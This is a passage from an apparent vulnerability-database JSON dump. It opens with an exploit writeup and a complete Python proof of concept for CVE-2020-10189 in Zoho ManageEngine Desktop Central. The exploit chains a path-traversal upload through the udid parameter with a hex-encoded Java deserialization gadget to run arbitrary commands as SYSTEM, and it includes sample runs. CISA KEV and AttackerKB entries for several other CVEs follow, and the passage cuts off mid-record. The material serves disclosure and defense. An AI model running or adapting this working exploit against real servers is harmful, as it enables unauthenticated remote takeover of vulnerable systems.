\"log|txt|zip|7z\"))) { // 5\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : Going to reject the file upload {0}\", fileName);\n response.sendError(403, \"Request Refused\");\n return;\n }\n String absoluteFileName = localDirToStore + File.separator + fileName; // 6\n\n logger.log(Level.WARNING, \"absolute File Name {0} \", new Object[]{fileName});\n\n InputStream in = null;\n FileOutputStream fout = null;\n try {\n in = request.getInputStream(); // 7\n fout = new FileOutputStream(absoluteFileName); // 8\n\n byte[] bytes = new byte['\u2710'];\n int i;\n while ((i = in.read(bytes)) != -1) {\n fout.write(bytes, 0, i); // 9\n }\n fout.flush();\n } catch (Exception e1) {\n e1.printStackTrace();\n } finally {\n if (fout != null) {\n fout.close();\n }\n if (in != null) {\n in.close();\n }\n }\n SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();\n supportFileCreation.incrementMDMLogUploadCount();\n JSONObject deviceDetails = new JSONObject();\n deviceDetails.put(\"platformType\", platformType);\n deviceDetails.put(\"dataId\", resourceID);\n deviceDetails.put(\"dataValue\", deviceName);\n supportFileCreation.removeDeviceFromList(deviceDetails);\n } else {\n logger.log(Level.WARNING,\n \"MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}\",\n nDataLength);\n response.sendError(403, \"Request Refused\");\n return;\n }\n return;\n } catch (Exception e) {\n logger.log(Level.WARNING, \"Exception \", e);\n } finally {\n if (reader != null) {\n try {\n reader.close();\n } catch (Exception ex) {\n ex.fillInStackTrace();\n }\n }\n }\n }\n```\n\n```\n private static boolean isContainDirectoryTraversal(String fileName) {\n if ((fileName.contains(\"/\")) || (fileName.contains(\"\\\\\"))) {\n return true;\n }\n return false;\n }\n\n //...\n\n public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {\n if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))\n || (!isValidFileExtension(fileName, allowedFileExt))) {\n return true;\n }\n return false;\n }\n```\n\nWe can see that at [1] the `udid` variable is controlled using the `udid` GET parameter from a POST request. At [2] the `fileName` variable is controlled from the GET parameter `filename`. This `filename` GET parameter is actually filtered in 2 different ways for malicious values. At [3] a path is contructed using the GET parameter from [1] and at [4] a `mkdirs` primitive is hit. This is important because the _charts directory doesn't exist on the filesystem which is needed in order to exploit the deserialization bug. There is some validation on the `filename` at [5] which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow list of extensions.\n\nOf course, this doesn't stop `udid` from containing directory traversals, but I digress. At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:\n\n```config-filesecurity-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,security-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml```\n\nThe file that stands out is the `security-mdm-agent.xml` config file. The corrosponding entry for the `MDMLogUploaderServlet` servlet looks like this:\n\n``````\n\nNote that the authentication attribute is ignored in this case. The `filename` GET parameter is restricted to the following strings: \"logger.txt\", \"logger.zip\", \"mdmlogs.zip\" and \"managedprofile_mdmlogs.zip\" using a regex pattern. For exploitation, this limitation doesn't matter since the deserialization bug permits a completely controlled filename.\n\n## Example:\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py(+) eg: ./poc.py 172.16.175.153 mspaint.exe\n\nsaturn:~ mr_me$ ./poc.py 172.16.175.153 \"cmd /c whoami > ../webapps/DesktopCentral/si.txt\"\n(+) planted our serialized payload\n(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt\n\nsaturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt\nnt authority\\system\n\"\"\"\nimport os\nimport sys\nimport struct\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_payload(c):\n p = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594\"\n p += \"da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400\"\n p += \"164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200\"\n p += \"2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265\"\n p += \"616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172\"\n p += \"61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e\"\n p += \"672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e\"\n p += \"732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172\"\n p += \"61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75\"\n p += \"7470757450726f706572746965737704000000037372003a636f6d2e73756e2e\"\n p += \"6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e\"\n p += \"747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d\"\n p += \"5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00\"\n p += \"0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a\"\n p += \"6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f\"\n p += \"6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072\"\n p += \"6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767\"\n p += \"db37020000787000000002757200025b42acf317f8060854e002000078700000\"\n p += \"069bcafebabe0000003200390a00030022070037070025070026010010736572\"\n p += \"69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75\"\n p += \"6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465\"\n p += \"01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162\"\n p += \"6c655461626c6501000474686973010013537475625472616e736c6574506179\"\n p += \"6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c\"\n p += \"2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73\"\n p += \"6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f\"\n p += \"73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873\"\n p += \"6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c\"\n p += \"2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469\"\n p += \"6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73\"\n p += \"756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c\"\n p += \"74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f\"\n p += \"72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65\"\n p += \"722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074\"\n p += \"696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78\"\n p += \"616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e\"\n p += \"2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d\"\n p += \"417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865\"\n p += \"2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69\"\n p += \"7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63\"\n p += \"6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64\"\n p += \"746d2f44544d417869734974657261746f723b01000768616e646c6572010041\"\n p += \"4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c\"\n p += \"2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572\"\n p += \"3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a\"\n p += \"000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f\"\n p += \"4761646765747324537475625472616e736c65745061796c6f6164010040636f\"\n p += \"6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f\"\n p += \"78736c74632f72756e74696d652f41627374726163745472616e736c65740100\"\n p += \"146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f\"\n p += \"6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f\"\n p += \"5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061\"\n p += \"796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100\"\n p += \"116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469\"\n p += \"6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a\"\n p += \"002b002e01000708003001000465786563010027284c6a6176612f6c616e672f\"\n p += \"537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033\"\n p += \"0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961\"\n p += \"6c2f50776e6572373633323838353835323036303901001f4c79736f73657269\"\n p += \"616c2f50776e657237363332383835383532303630393b002100020003000100\"\n p += \"040001001a000500060001000700000002000800040001000a000b0001000c00\"\n p += \"00002f00010001000000052ab70001b100000002000d0000000600010000002e\"\n p += \"000e0000000c000100000005000f003800000001001300140002000c0000003f\"\n p += \"0000000300000001b100000002000d00000006000100000033000e0000002000\"\n p += \"0300000001000f00380000000000010015001600010000000100170018000200\"\n p += \"19000000040001001a00010013001b0002000c000000490000000400000001b1\"\n p += \"00000002000d00000006000100000037000e0000002a000400000001000f0038\"\n p += \"00000000000100150016000100000001001c001d000200000001001e001f0003\"\n p += \"0019000000040001001a00080029000b0001000c00000024000300020000000f\"\n p += \"a70003014cb8002f1231b6003557b10000000100360000000300010300020020\"\n p += \"00000002002100110000000a000100020023001000097571007e0010000001d4\"\n p += \"cafebabe00000032001b0a000300150700170700180700190100107365726961\"\n p += \"6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505\"\n p += \"71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100\"\n p += \"0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65\"\n p += \"5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365\"\n p += \"730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164\"\n p += \"6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473\"\n p += \"2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61\"\n p += \"64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f\"\n p += \"4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f\"\n p += \"79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300\"\n p += \"2100020003000100040001001a00050006000100070000000200080001000100\"\n p += \"0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000\"\n p += \"000600010000003b000e0000000c000100000005000f00120000000200130000\"\n p += \"0002001400110000000a000100020016001000097074000450776e7270770100\"\n p += \"7871007e000d78\"\n obj = bytearray(bytes.fromhex(p))\n obj[0x240:0x242] = struct.pack(\">H\", len(c) + 0x694)\n obj[0x6e5:0x6e7] = struct.pack(\">H\", len(c))\n start = obj[:0x6e7]\n end = obj[0x6e7:]\n return start + str.encode(c) + end\n\ndef we_can_plant_serialized(t, c):\n # stage 1 - traversal file write primitive\n uri = \"https://%s:8383/mdm/client/v1/mdmLogUploader\" % t\n p = {\n \"udid\" : \"si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart\",\n \"filename\" : \"logger.zip\"\n }\n h = { \"Content-Type\" : \"application/octet-stream\" }\n d = _get_payload(c)\n r = requests.post(uri, params=p, data=d, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_execute_cmd(t):\n # stage 2 - deserialization\n uri = \"https://%s:8383/cewolf/\" % t\n p = { \"img\" : \"\\\\logger.zip\" }\n r = requests.get(uri, params=p, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef main():\n if len(sys.argv) != 3:\n print(\"(+) usage: %s\" % sys.argv[0])\n print(\"(+) eg: %s 172.16.175.153 mspaint.exe\" % sys.argv[0])\n sys.exit(1)\n t = sys.argv[1]\n c = sys.argv[2]\n if we_can_plant_serialized(t, c):\n print(\"(+) planted our serialized payload\")\n if we_can_execute_cmd(t):\n print(\"(+) executed: %s\" % c)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2020-0011.py.txt"}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine Desktop Central Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-10189", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Remote code execution via Widget Connector macro Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-3396", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco RV320 and RV325 Routers Improper Access Control Vulnerability (COVID-19-CTI list)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-1653", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Issue in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 allowing Directory Traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Citrix Application Delivery Controller and Citrix Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-19781", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business Routers Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2019-1652", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-07-10T23:05:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:38", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2019-3396", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-26T13:47:28", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:30pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**space-r7** at May 22, 2019 1:34pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-25T00:00:00", "type": "attackerkb", "title": "Confluence Unauthorized RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2021-02-10T00:00:00", "id": "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "href": "https://attackerkb.com/topics/2uHJW7vbky/confluence-unauthorized-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:16:25", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, 